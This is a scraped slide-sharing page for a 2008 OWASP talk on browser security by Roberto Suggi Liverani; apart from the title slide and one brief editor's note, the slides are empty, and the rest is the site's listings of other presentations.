This talk was not generated with ChatGPT: how AI is changing science by
This talk was not generated with ChatGPT: how AI is changing scienceThis talk was not generated with ChatGPT: how AI is changing science
This talk was not generated with ChatGPT: how AI is changing scienceElena Simperl
44 views13 slides
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf by
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfAdopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfMichaelOLeary82
16 views74 slides
Building a Strong Data Governance Framework for DevOps | Software Development... by
Building a Strong Data Governance Framework for DevOps | Software Development...Building a Strong Data Governance Framework for DevOps | Software Development...
Building a Strong Data Governance Framework for DevOps | Software Development...Dieter Ziegler
20 views7 slides
Business Analyst Series 2023 - Week 4 Session 8 by
Business Analyst Series 2023 - Week 4 Session 8Business Analyst Series 2023 - Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8DianaGray10
238 views13 slides
Show and tell: What’s in your tech stack? - Tech Forum 2023 by
Show and tell: What’s in your tech stack? - Tech Forum 2023Show and tell: What’s in your tech stack? - Tech Forum 2023
Show and tell: What’s in your tech stack? - Tech Forum 2023BookNet Canada
40 views78 slides
CryptoBotsAI by
CryptoBotsAICryptoBotsAI
CryptoBotsAIchandureddyvadala199
48 views5 slides

Recently uploaded (20)

The Role of Patterns in the Era of Large Language Models by Yunyao Li
The Role of Patterns in the Era of Large Language ModelsThe Role of Patterns in the Era of Large Language Models
The Role of Patterns in the Era of Large Language Models
Yunyao Li134 views
Netmera Presentation.pdf by Mustafa Kuğu
Netmera Presentation.pdfNetmera Presentation.pdf
Netmera Presentation.pdf
Mustafa Kuğu23 views
Qualifying SaaS, IaaS.pptx by Sachin Bhandari
Qualifying SaaS, IaaS.pptxQualifying SaaS, IaaS.pptx
Qualifying SaaS, IaaS.pptx
Sachin Bhandari1.2K views
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」 by PC Cluster Consortium
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
PC Cluster Consortium43 views
A plenarily integrated SIEM solution and it’s Deployment by Bangladesh Network Operators Group
A plenarily integrated SIEM solution and it’s DeploymentA plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s Deployment
Bangladesh Network Operators Group42 views
LLMs in Production: Tooling, Process, and Team Structure by Aggregage
LLMs in Production: Tooling, Process, and Team StructureLLMs in Production: Tooling, Process, and Team Structure
LLMs in Production: Tooling, Process, and Team Structure
Aggregage110 views
Cencora Executive Symposium by marketingcommunicati21
Cencora Executive SymposiumCencora Executive Symposium
Cencora Executive Symposium
marketingcommunicati21216 views
Five Ways to Automate API Testing with Postman by Postman
Five Ways to Automate API Testing with PostmanFive Ways to Automate API Testing with Postman
Five Ways to Automate API Testing with Postman
Postman48 views
Cocktail of Environments. How to Mix Test and Development Environments and St... by Aleksandr Tarasov
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...
Aleksandr Tarasov27 views
AI + Memoori = AIM by Memoori
AI + Memoori = AIMAI + Memoori = AIM
AI + Memoori = AIM
Memoori41 views
Xavier M Culmination Presenetation Final 12-7.pptx by manzanaresxavier28
Xavier M Culmination Presenetation Final 12-7.pptxXavier M Culmination Presenetation Final 12-7.pptx
Xavier M Culmination Presenetation Final 12-7.pptx
manzanaresxavier2843 views
User Centred Design and Implementation of Useful Picture Archiving and Commun... by Lighton Phiri
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...
Lighton Phiri24 views
Discover Aura Workshop (12.5.23).pdf by Neo4j
Discover Aura Workshop (12.5.23).pdfDiscover Aura Workshop (12.5.23).pdf
Discover Aura Workshop (12.5.23).pdf
Neo4j28 views
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And... by ShapeBlue
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
ShapeBlue166 views
This talk was not generated with ChatGPT: how AI is changing science by Elena Simperl
This talk was not generated with ChatGPT: how AI is changing scienceThis talk was not generated with ChatGPT: how AI is changing science
This talk was not generated with ChatGPT: how AI is changing science
Elena Simperl44 views
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf by MichaelOLeary82
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdfAdopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
Adopting Karpenter for Cost and Simplicity at Grafana Labs.pdf
MichaelOLeary8216 views
Building a Strong Data Governance Framework for DevOps | Software Development... by Dieter Ziegler
Building a Strong Data Governance Framework for DevOps | Software Development...Building a Strong Data Governance Framework for DevOps | Software Development...
Building a Strong Data Governance Framework for DevOps | Software Development...
Dieter Ziegler20 views
Business Analyst Series 2023 - Week 4 Session 8 by DianaGray10
Business Analyst Series 2023 - Week 4 Session 8Business Analyst Series 2023 - Week 4 Session 8
Business Analyst Series 2023 - Week 4 Session 8
DianaGray10238 views
Show and tell: What’s in your tech stack? - Tech Forum 2023 by BookNet Canada
Show and tell: What’s in your tech stack? - Tech Forum 2023Show and tell: What’s in your tech stack? - Tech Forum 2023
Show and tell: What’s in your tech stack? - Tech Forum 2023
BookNet Canada40 views
CryptoBotsAI by chandureddyvadala199
CryptoBotsAICryptoBotsAI
CryptoBotsAI
chandureddyvadala19948 views

Browser Security

  • 1. OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.

Editor's Notes

  1. Updateready-&gt; application cache is not the newest

Report as inappropriate

*Required
Copyright Complaint

8 likes

views

Total views16,387
On Slideshare0
From embeds0
Number of embeds0